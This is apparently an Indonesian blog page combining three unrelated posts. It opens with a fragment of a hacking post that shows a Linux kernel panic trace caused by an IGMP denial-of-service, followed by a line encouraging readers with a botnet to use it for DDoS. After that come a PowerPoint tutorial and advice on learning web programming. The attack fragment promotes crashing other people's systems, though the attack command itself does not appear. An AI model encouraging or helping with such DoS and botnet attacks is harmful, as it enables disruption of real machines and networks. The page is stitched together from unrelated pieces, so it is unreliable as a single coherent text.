[16111.048664] Modules linked in: netconsole configfs ip6table_filter ip6_tables ebtable_nat ebtables ipt_MASQUERADE iptable_nat nf_nat nf_conntrack_ipv4 nf_defrag_ipv4 xt_state nf_conntrack ipt_REJECT xt_CHECKSUM acpi_cpufreq mperf iptable_mangle cpufreq_powersave cpufreq_conservative xt_tcpudp iptable_filter cpufreq_stats ip_tables x_tables cpufreq_userspace bridge stp parport_pc ppdev lp parport bnep rfcomm binfmt_misc deflate ctr twofish_generic twofish_x86_64 twofish_common camellia serpent blowfish cast5 des_generic xcbc rmd160 sha512_generic sha1_generic hmac crypto_null af_key ext2 fuse loop kvm_intel kvm ecb btusb bluetooth snd_hda_codec_conexant crc16 uvcvideo videodev snd_hda_intel media cdc_ether snd_hda_codec v4l2_compat_ioctl32 usbnet cdc_acm mii snd_hwdep cdc_wdm arc4 snd_pcm_oss snd_mixer_oss snd_pcm thinkpad_acpi snd_seq_midi snd_rawmidi iwlagn snd_seq_midi_event mac80211 cfg80211 snd_seq snd_timer snd_seq_device iTCO_wdt i2c_i801 snd snd_page_alloc iTCO_vendor_support rfkill i915 drm_kms_helper drm soundcore i2c_algo_bit tpm_tis psmouse tpm i2c_core wmi battery pcspkr tpm_bios ac nvram power_supply evdev serio_raw video processor button ext3 jbd mbcache btrfs zlib_deflate crc32c libcrc32c cbc dm_snapshot dm_mirror dm_region_hash dm_log dm_crypt dm_mod cryptd aes_x86_64 aes_generic sha256_generic sd_mod crc_t10dif uhci_hcd ata_generic thermal thermal_sys ahci libahci ehci_hcd libata e1000e scsi_mod usbcore [last unloaded: scsi_wait_scan]
[16111.051698]
[16111.051732] Pid: 5416, comm: NetworkManager Not tainted 3.1.0-1-amd64 #1 LENOVO 74663RG/74663RG
[16111.051888] RIP: 0010:[<ffffffff812bf78c>]  [<ffffffff812bf78c>] igmp_start_timer+0x1a/0x47
[16111.052013] RSP: 0018:ffff88013bc83ab0  EFLAGS: 00010246
[16111.052013] RAX: 000000000efb921d RBX: ffff8801347932c0 RCX: 00000001003c507a
[16111.052013] RDX: 0000000000000000 RSI: 0000000056000000 RDI: ffff8801347932f8
[16111.052013] RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000000
[16111.052013] R10: 0000000000000000 R11: 0000000000000000 R12: ffff8801363ca480
[16111.052013] R13: 00000000fb0000e0 R14: 0000000000000000 R15: 0000000000000000
[16111.052013] FS:  00007f3909c057e0(0000) GS:ffff88013bc80000(0000) knlGS:0000000000000000
[16111.052013] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[16111.052013] CR2: 00007f3906e2449b CR3: 00000001097a2000 CR4: 00000000000006e0
[16111.052013] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[16111.052013] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
[16111.052013] Process NetworkManager (pid: 5416, threadinfo ffff880116fe0000, task ffff8800af283510)
[16111.052013] Stack:
[16111.052013]  ffff8801347932f8 ffff8801347932c0 ffff8800373cc3c0 ffffffff812c166e
[16111.052013]  0000000000000000 ffff8801347932f8 ffff880134793350 0000000000000000
[16111.052013]  0002000000000000 ffff8800373cc3c0 ffffffff817f8280 0000000000000002
[16111.052013] Call Trace:
[16111.052013]  <IRQ>
[16111.052013]  [<ffffffff812c166e>] ? igmp_rcv+0x480/0x515
[16111.052013]  [<ffffffff81297cdf>] ? ip_local_deliver_finish+0x137/0x1a4
[16111.052013]  [<ffffffff8126f54f>] ? __netif_receive_skb+0x3e3/0x415
[16111.052013]  [<ffffffff81270dc0>] ? netif_receive_skb+0x63/0x69
[16111.052013]  [<ffffffffa03c4775>] ? ieee80211_frame_allowed+0x68/0xc3 [mac80211]
[16111.052013]  [<ffffffffa03c4b33>] ? ieee80211_deliver_skb+0xbb/0xf1 [mac80211]
[16111.052013]  [<ffffffffa03c5d67>] ? ieee80211_rx_handlers+0xf19/0x1755 [mac80211]
[16111.052013]  [<ffffffff81291f5d>] ? nf_iterate+0x41/0x77
[16111.052013]  [<ffffffff81297804>] ? inet_del_protocol+0x27/0x27
[16111.052013]  [<ffffffffa03c6d15>] ? ieee80211_prepare_and_rx_handle+0x772/0x7ca [mac80211]
[16111.052013]  [<ffffffffa03c7440>] ? ieee80211_rx+0x6d3/0x6f8 [mac80211]
[16111.052013]  [<ffffffffa03f04b6>] ? iwl_rx_reply_rx+0x429/0x441 [iwlagn]
[16111.052013]  [<ffffffff811acff2>] ? is_swiotlb_buffer+0x23/0x2f
[16111.052013]  [<ffffffffa03f61b4>] ? iwl_irq_tasklet+0x3cb/0x645 [iwlagn]
[16111.052013]  [<ffffffff8104afe0>] ? raise_softirq_irqoff+0x6/0x25
[16111.052013]  [<ffffffff8104a52a>] ? tasklet_action+0x73/0xc2
[16111.052013]  [<ffffffff8104ad14>] ? __do_softirq+0xb9/0x177
[16111.052013]  [<ffffffff81334a2c>] ? call_softirq+0x1c/0x30
[16111.052013]  [<ffffffff8100f845>] ? do_softirq+0x3c/0x7b
[16111.052013]  [<ffffffff8104af7c>] ? irq_exit+0x3c/0x9a
[16111.052013]  [<ffffffff8100f575>] ? do_IRQ+0x82/0x98
[16111.052013]  [<ffffffff8132db2e>] ? common_interrupt+0x6e/0x6e
[16111.052013]  <EOI>
[16111.052013]  [<ffffffff810b6195>] ? get_page_from_freelist+0x2b2/0x665
[16111.052013]  [<ffffffff810b6043>] ? get_page_from_freelist+0x160/0x665
[16111.052013]  [<ffffffff810b67d4>] ? __alloc_pages_nodemask+0x12b/0x748
[16111.052013]  [<ffffffff810b6d89>] ? __alloc_pages_nodemask+0x6e0/0x748
[16111.052013]  [<ffffffff810df014>] ? alloc_pages_current+0xb2/0xcc
[16111.052013]  [<ffffffff8102f6fd>] ? pte_alloc_one+0x11/0x39
[16111.052013]  [<ffffffff810ca1c6>] ? __pte_alloc+0x19/0x11e
[16111.052013]  [<ffffffff810cc42e>] ? handle_mm_fault+0x18d/0x1ea
[16111.052013]  [<ffffffff813307c0>] ? do_page_fault+0x312/0x337
[16111.052013]  [<ffffffff810b9389>] ? put_page+0x18/0x27
[16111.052013]  [<ffffffff810ca93b>] ? do_wp_page+0x551/0x563
[16111.052013]  [<ffffffff810cc0b7>] ? handle_pte_fault+0x739/0x79f
[16111.052013]  [<ffffffff8132ddf5>] ? page_fault+0x25/0x30
[16111.052013]  [<ffffffff811a2ca3>] ? __strncpy_from_user+0x32/0x48
[16111.052013]  [<ffffffff811a2c89>] ? __strncpy_from_user+0x18/0x48
[16111.052013]  [<ffffffff810fc331>] ? getname_flags+0x152/0x1d7
[16111.052013]  [<ffffffff810148a5>] ? sys_execve+0x1a/0x54
[16111.052013]  [<ffffffff81332c2c>] ? stub_execve+0x6c/0xc0
[16111.052013] Code: 0c 58 48 8d 7b 08 5b 5d e9 5a f8 ff ff 58 5b 5d c3 55 89 f5 53 48 89 fb 52 e8 b4 3d ee ff 31 d2 48 8b 0d 78 08 3d 00 48 8d 7b 38 <f7> f5 c6 83 94 00 00 00 01 48 63 d2 48 8d 74 11 02 e8 bb 24 d9
[16111.052013] RIP  [<ffffffff812bf78c>] igmp_start_timer+0x1a/0x47
[16111.052013]  RSP <ffff88013bc83ab0>
[16111.168911] ---[ end trace 3945f5f1af3c1493 ]---
[16111.168922] Kernel panic - not syncing: Fatal exception in interrupt
[16111.171624] Pid: 5416, comm: NetworkManager Tainted: G      D      3.1.0-1-amd64 #1
[16111.174416] Call Trace:
binushacker $


DoS dengan IGMP ini juga bisa dilakukan di DDOS, apabila kalian memiliki BOTNET Selamat mencoba semoga berhasil..

read more

Presentasi PowerPoint berfungsi mirip tampilan slide. Untuk menyampaikan pesan atau cerita, Anda membaginya menjadi slide. Pikirkan slide sebagai kanvas kosong untuk gambar, kata-kata, dan bentuk yang akan membantu Anda menyusun cerita Anda.

Memilih tema

Saat Anda membuka PowerPoint, Anda akan melihat beberapa tema dan templat bawaan. Tema adalah desain slide yang berisi warna, font, dan efek khusus yang sesuai, seperti bayangan, pantulan, dan masih banyak lagi.
  1. Pilih tema.
  2. Klik Buat, atau ambil ragam warna, lalu klik Buat.

    Memperlihatkan Buat Presentasi Baru dari dialog Tema di PowerPoint

Menyisipkan slide baru

  • Pada tab Beranda , klik bagian bawah Slide baru, dan pilih tata letak slide.
    Memperlihatkan tombol Slide Baru pada tab Beranda dari pita di PowerPoint

    Menyimpan presentasi Anda

  • Pada tab File, pilih Simpan.
  • Pilih atau cari ke folder.
  • Dalam kotak nama File , ketikkan nama untuk presentasi Anda, dan lalu pilih Simpan.
Catatan: Jika Anda sering menyimpan file pada folder tertentu, Anda bisa ‘menyematkan’ path tersebut sehingga selalu tersedia (sebagaimana diperlihatkan di bawah).

Menyimpan presentasi PowerPoint Anda

Menambahkan teks

Klik tempat penampung teks, dan mulailah mengetik.
Memperlihatkan menambahkan teks ke bidang teks di PowerPoint

Memformat teks Anda

  1. Pilih teks.
  2. Di bawah Alat Menggambar, pilih Format.

    Perlihatkan tab Alat Gambar di pita dalam PowerPoint


  3. Lakukan salah satu hal berikut ini:
  4. Untuk mengubah warna teks Anda, pilih Isian Teks, lalu pilih sebuah warna.
  5. Untuk mengubah warna kerangka bentuk teks Anda, pilih Kerangka Teks, lalu pilih sebuah warna.
  6. Untuk menerapkan bayangan, pantulan, cahaya, kemiringan, rotasi 3D, transformasi, pilih Efek Teks, lalu pilih efek yang Anda inginkan.

Menambahkan gambar

Pada tab Sisipkan, lakukan salah satu hal berikut ini:
  • Untuk menyisipkan gambar yang disimpan di drive lokal Anda atau di server internal, klik Gambar, telusuri gambar, lalu pilih Sisipkan.
  • Untuk menyisipkan gambar dari web, pilih Gambar Online, dan gunakan kotak pencarian untuk menemukan gambar.
    Dialog Sisipkan Gambar di PowerPoint
  • Pilih gambar, dan kemudian klik sisipkan.

Menambahkan catatan pembicara

Slide akan sangat baik jika Anda tidak menjejalkan terlalu banyak informasi. Anda bisa menambahkan fakta dan catatan dalam catatan pembicara, dan jadikan rujukan Anda saat menjalankan presentasi.
  1. Untuk membuka panel catatan, pada bagian bawah jendela, klik Catatan tombol catatan di PowerPoint .
  2. Klik di dalam panel Catatan di bawah slide tersebut, dan ketikkan catatan Anda.
    Memperlihatkan panel Catatan pembicara di PowerPoint
Menyampaikan presentasi Anda Pada tab Peragaan Slide, lakukan salah satu hal berikut ini:
  • Untuk memulai presentasi pada slide pertama, di grup Mulai Peragaan Slide, klik Dari Awal.

    Memperlihatkan tab Peragaan Slide pada pita di PowerPoint


  • Jika Anda tidak berada di slide pertama dan Anda ingin memulai dari posisi Anda, klik Dari Slide Saat Ini.
  • Jika Anda ingin menyajikan ke orang yang tidak berada di tempat Anda, klik Sajikan Online untuk menyetel presentasi di web, lalu pilih salah satu opsi berikut:

    Keluar dari tampilan Peragaan Slide

    Untuk keluar dari tampilan Peragaan Slide kapan saja, pada keyboard, tekan Esc.

read more

Pertanyaan diatas sangat sering diajukan oleh programmer pemula atau kalangan awam yang ingin mulai belajar web programming. Saya juga sering ditanya terkait masalah ini baik melalui email maupun dari kolom komentar yang ada di duniailkom. Ini sangat sangat bisa dimaklumi, karena saking beragamnya materi terkait web programming, banyak programmer pemula bingung mesti memulai dari mana.



karena masalah itu saya sebelumnya berkaca pada saya sewaktu newbi atau pemula belajar pemrograman ,  memutuskan untuk membuat artikel khusus mengenai masalah ini, dan semoga bisa menjadi panduan dasar untuk kalian semua .


Ingin belajar web programming, harus mulai dari mana?” Pertanyaan ini juga ada dipikiran saya sewaktu mulai belajar web programming, apakah mesti belajar algoritma dulu? HTMLPHP? atau apa? Juga berapa lama waktu yang dibutuhkan untuk menjadi web programmer yang ahli?
Saya akan mencoba menjawab semua pertanyaan ini berdasarkan pengalaman pribadi. Buat kalian yang sudah lama ‘makan asam garam’ web programming, mungkin memiliki pendapat berbeda, silahkan tinggalkan komentar di akhir postingan Ya ..

Saya ingin mempelajari web programming, harus memulai dari mana ya?

Jawaban singkatnya: mulai dari HTML.
HTML adalah inti dari seluruh halaman web. Sangat mustahil untuk membuat website tanpa memiliki dasar pengetahuan tentang HTML. Untungnya, HTML juga sangat mudah dipelajari. Anda tidak perlu memiliki dasar programming atau pengetahuan tentang algoritma apapun. Satu-satunya kemampuan yang dibutuhkan adalah anda sudah cukup familiar dengan cara penggunaan web browser seperti Google Chrome atau Mozilla Firefox.

Setelah HTML, lanjut kemana?

Jika anda sudah menguasai HTML (minimal dasar-dasar HTML), bisa memilih antara CSS atau PHP. Apabila berminat dengan web design, silahkan lanjut mempelajari CSS. Apabila anda ingin membuat aplikasi web seperti pemrosesan form, menyimpan data ke database, membuat laporan, dll bisa lanjut ke PHP.
Saya pribadi lebih menyarankan untuk lanjut ke CSS. Dengan demikian, akan memiliki dasar yang pas dan bisa memahami bagaimana cara membuat tampilan website dan mempercantik desain halaman web.
Sama seperti HTML, CSS juga tidak membutuhkan pengetahuan apapun terkait programming. Baik CSS maupun HTML sebenarnya bukanlah sebuah ‘bahasa pemrograman’. Keduanya adalah bahasa struktur yang terdiri dari perintah-perintah sederhana (walaupun CSS mungkin ‘sedikit’ lebih rumit daripada HTML).
Duniailkom juga sudah menyediakan Tutorial CSS dasar yang bisa menjadi panduan untuk memulai belajar CSS.

Web Programming dengan PHP

Selanjutnya, setelah mempelajari HTML dan CSS, anda bisa lanjut ke PHP. Berbeda dengan HTML dan CSS, PHP ‘murni’ sebuah bahasa pemrograman komputer. HTML dan CSS sendiri belum bisa dikatakan bahasa pemrograman, tapi lebih ke bahasa kode. Di PHP inilah web programming yang sebenarnya.
PHP digunakan untuk membuat ‘program’ sebenarnya dari sebuah website. Mulai dari mengatur alur logika, memproses hasil form HTML, hingga berkomunikasi dengan database seperti MySQL. Jika anda membuat sebuah website modern, 80% waktu akan anda habiskan membuat kode program PHP, terutama website kaya fitur seperti sistem informasi, ujian online, portal berita, dll.
Untuk dapat mempelajari PHP, sebaiknya punya dasar-dasar programming. Walaupun begitu, Duniailkom telah menyediakan tutorial PHP dasar untuk pemula yang dilengkapi langkah-langkah dari awal, sehingga anda bisa mempelajari PHP walaupun tidak memiliki dasar programming.

Menyimpan Data di Database MySQL

Ketika membuat website dengan PHP, kadang kita perlu untuk menyimpan data seperti registrasi user, laporan penjualan, hasil perhitungan, dll. Media penyimpanan ini dikenal dengan database.
Terdapat beragam aplikasi database yang bisa digunakan, saat ini aplikasi database yang paling populer untuk web programming adalah MySQL. Anda bisa mempelajari MySQL pada saat bersamaan dengan PHP atau fokus ke PHP, baru kemudian lanjut ke MySQL.
Jika anda mengikuti perkembangan terbaru web programming, sekarang juga muncul aplikasi database baru: MariaDBMariaDB sebenarnya adalah ‘cloningan‘ dari MySQL. Seluruh perintah di MySQL tetap berjalan di MariaDB. Oleh karena itu anda tidak perlu khawatir untuk mulai belajar MySQL (walaupun nantinya akan menggunakan MariaDB).

Animasi dengan JavaScript

Materi terakhir yang perlu dikuasai adalah JavaScript. Sama seperti PHP, JavaScript merupakan bahasa pemrograman murni.
JavaScript diperlukan untuk membuat halaman website yang interaktif, seperti apa yang terjadi ketika sebuah tombol di-klik, menampilkan pesan kesalahan jika salah mengisi form, membuat animasi hingga game online berbasis web.
Sebenarnya, anda bisa langsung mempelajari JavaScript setelah belajar HTML, tapi saya menyarankan untuk masuk ke JavaScript setelah paham PHP, terutama jika anda belum pernah mempelajari bahasa pemrograman komputer sebelumnya.
JavaScript menggunakan konsep pemrograman berbasis objek (Object Oriented Programming). Konsep OOP cukup sulit untuk pemula (terutama jika anda belum pernah belajar OOP). Walaupun begitu, dengan materi dan panduan yang sesuai, belajar JavaScript sangat menyenangkan. Fitur dan hasil akhir yang bisa didapat dengan JavaScript sangat menarik, seperti animasi, konten interaktif, dll.

HTML + CSS + PHP + MySQL + JavaScript, berapa lama untuk menguasai semua ini?

Jawabnya: tergantung :)
Ada beberapa faktor yang harus dipertimbangkan. Pertama, kata-kata ‘menguasai’ disini sangat relatif.
Untuk sekedar ‘tahu’ tentang fungsi masing-masing ‘bahasa’ ini, anda bisa meluangkan waktu sekitar 1 minggu (hari pertama belajar HTML, hari kedua belajar CSS, dst). Tapi sekali lagi, ini hanya untuk sekedar ‘tahu’, itupun jika anda tidak pusing dengan pembahasan masing2nya :)
Bahasan untuk setiap ‘bahasa’ ini sangat banyak. Apabila anda melihat-lihat buku terbitan luar seperti di amazon.com, beberapa buku bahkan memiliki hingga 1000 halaman, dan itu hanya khusus membahas satu macam materi seperti HTML saja, PHP saja, atau JavaScript saja. Buku manual resmi PHP dan MySQL bahkan bisa mencapai 2000 halaman.
Jadi, mungkin pertanyaannya bisa dibalik, yakni seberapa banyak yang ingin anda pahami? Dengan asumsi setiap hari meluangkan waktu 4-5 jam untuk belajar, dalam 1 bulan anda bisa dianggap sudah menguasai 1 materi (+ beberapa minggu untuk latihan kode program), sehingga total dalam 5 bulan sudah bisa menguasai HTML, CSS, PHP, MySQL, dan JavaScript. Ini dengan catatan anda sudah memiliki sumber bacaan yang mudah dipahami seperti buku, ebook, maupun tutorial online.

Huff, baiklah saya sudah cukup paham tentang HTML, CSS, PHP, MySQL, dan JavaScript, jadi apakah sudah selesai?

Sekali lagi, ini tergantung dari berbagai faktor. Jika anda berniat mempelajari web programming sebagai ‘hobi’ atau sekedar mengisi waktu luang, memahami kelima bahasa pemrograman web diatas dirasa sudah cukup. Tapi bagi anda yang berniat serius terjun ke dunia web programming, atau bahkan ingin memiliki karir sebagai web programmer, ini baru sebagai “gerbang awal”.
Dunia ilmu komputer, terutama web programming berkembang dengan sangat cepat. Setiap bulan (jika bukan setiap hari) lahir teknologi baru yang bisa digunakan untuk membuat website yang lebih “wah” dari sebelumnya. Teknologi ini hadir dalam bentuk library, plugin, framework, CMS atau bahkan sebuah bahasa pemrograman baru.
Sebagai contoh, di dalam bahasa pemrograman PHP, anda juga akan dituntut untuk memahami frameworkFramework adalah kumpulan kode program dengan aturan tertentu yang bisa digunakan untuk menghasilkan website dengan cepat. Beberapa framework PHP yang cukup terkenal adalah Laravel, Code Igniter, Yii Framework, dan Zend Framework.
Dari sisi desain web (CSS), terdapat framework seperti Bootstrap dan Zurb Fondation. Selain itu ada juga teknologi CSS preprocessor seperti Less dan Sass.
Untuk JavaScript tersedia berbagai teknologi library seperti jQuery, framework AngularJS, dan juga Node.js. Khusus untuk jQuery, duniailkom juga telah menyediakan tutorial dasarnya: Tutorial jQuery untuk pemula. Tp sebelum kesini, wajib sudah paham HTML dan JavaScript.
Melihat banyaknya teknologi yang harus dikuasai, pada titik ini umumnya anda harus memilih akan fokus kemana. Jika fokus ke web designer (dikenal juga sebagai front-end developer), kuasai secara mendalam HTML+CSS+JavaScript beserta frameworknya. Jika anda ingin fokus ke web programmer (dikenal juga dengan back-end developer), khususkan diri untuk mendalami PHP, MySQL dan berbagai framework-nya.
Sebagai pembuktian untuk kebutuhan akan framework, silahkan anda lihat lowongan kerja web programmer. Hampir semuanya membutuhkan syarat menguasai beberapa framework seperti Code Igniter, Laravel, atau jQuery.

Wah banyak banget yang harus dikuasai gan hehe

Lagi-lagi, ini tergantung dengan tujuan anda mempelajari web programming. Jika butuh untuk keperluan edukasi seperti tugas sekolah / membuat skripsi, silahkan fokus untuk menyelesaikannya, gunakan web programming sebagai ‘media’ untuk mencapai tujuan ini.
Tetapi jika anda serius ingin berkarir sebagai programmer, mempelajari setiap teknologi ini akan terasa sangat menyenangkan. Istilahnya, tiada hari tanpa ngoding :)
Sekian Artikel ini menjadi pedoman saya waktu waktu kelas 1 smk Waktu Awam Banget , belajar Pemrograman , saya bingung harus dari mana , Saya terus baca terus saya terapkan di diri saya . sampai sekarang saya juga masih belajar pemrograman .
Semoga tulisan singkat dari ini bisa memberikan gambaran apa yang akan anda hadapi dan apa yang harus anda kuasai untuk menjadi web programmer. Mudah-mudahan bermanfaat, dan jika ada ide/saran/pertanyaan/berbagi pengalaman, silahkan tinggalkan sepatah dua patah kata di kolom komentar

read more